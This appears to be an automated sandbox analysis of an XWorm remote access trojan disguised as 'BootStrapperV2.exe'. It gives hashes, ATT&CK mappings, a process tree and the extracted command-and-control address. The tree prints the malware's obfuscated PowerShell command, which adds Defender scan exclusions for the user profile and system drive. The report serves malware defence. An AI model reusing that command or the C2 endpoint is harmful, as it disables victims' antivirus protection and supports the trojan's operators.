xworm | 6c6218309f99b7daa7627c2f940f7f07e49eac4a868759cddda6a004e0e10a2e

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
03-11-2024 05:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

BootStrapperV2.exe
Size

86KB
MD5

18b7c253c7155c93a21a35a8f9389596
SHA1

5addcc53bf95e2f5fe72d4770b093f6262daeb55
SHA256

6c6218309f99b7daa7627c2f940f7f07e49eac4a868759cddda6a004e0e10a2e
SHA512

529bd396899184ca4b07a5d4fb2bfe1982c2d44fc4c24d3a15cf5f600c41fee49f3ce9f0798f47ce7b1482eacb23a33b9e2734e740a22924f52156b6e29b9608
SSDEEP

1536:hXARphtCCV1k1n8MZ0BNWL0pBfrICZFQECHNctTrzuaLi2vQPvG/UvI5MmmZu1Ac:huB1pi0XWikCZ4ctXzdvQPv0UIud8ArC

Score

10^/10

xworm defense_evasion rat trojan

Malware Config

Extracted

Family

xworm

where-reverse.gl.at.ply.gg:9999

Attributes

Install_directory
%ProgramData%
install_file
Helper.exe

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000c00000001202c-6.dat	family_xworm
behavioral1/memory/2260-12-0x00000000012E0000-0x00000000012FA000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Executes dropped EXE 1 IoCs

pid	Process
2260	BootStrapper.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\BootStrapper.exe	BootStrapperV2.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
904	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	904	powershell.exe
Token: SeDebugPrivilege	2260	BootStrapper.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2272 wrote to memory of 904	2272	BootStrapperV2.exe	30
PID 2272 wrote to memory of 904	2272	BootStrapperV2.exe	30
PID 2272 wrote to memory of 904	2272	BootStrapperV2.exe	30
PID 2272 wrote to memory of 2260	2272	BootStrapperV2.exe	32
PID 2272 wrote to memory of 2260	2272	BootStrapperV2.exe	32
PID 2272 wrote to memory of 2260	2272	BootStrapperV2.exe	32

C:\Users\Admin\AppData\Local\Temp\BootStrapperV2.exe
"C:\Users\Admin\AppData\Local\Temp\BootStrapperV2.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2272
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaABoACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAZwBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AawBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGcAeABjACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:904
- C:\Windows\BootStrapper.exe
  "C:\Windows\BootStrapper.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\BootStrapper.exe

Filesize
79KB

MD5
6a38c40e75c6a8bf59c27f075ae8fe50

SHA1
dea1a6673aba42fff5091f1098530db6378b4843

SHA256
3116545d3502db62348b0b8cd70a2a02e38a82309489f09cf11f346958c4b8e7

SHA512
1740a10610ec5327089ea2a14e4750253a4059803ec7545432d63189a8cf31b2d6ec8ae8a4f6db5ae3070f1cdfc5c5eb05cdd65c8687f522f5f96244a1839c0d

Download Submit
memory/904-14-0x000000001B730000-0x000000001BA12000-memory.dmp

Filesize
2.9MB

Download
memory/904-15-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2260-12-0x00000000012E0000-0x00000000012FA000-memory.dmp

Filesize
104KB

Download
memory/2272-0-0x000007FEF58E3000-0x000007FEF58E4000-memory.dmp

Filesize
4KB

Download
memory/2272-1-0x0000000000FA0000-0x0000000000FBC000-memory.dmp

Filesize
112KB

Download
memory/2272-4-0x000007FEF58E0000-0x000007FEF62CC000-memory.dmp

Filesize
9.9MB

Download
memory/2272-13-0x000007FEF58E0000-0x000007FEF62CC000-memory.dmp

Filesize
9.9MB

Download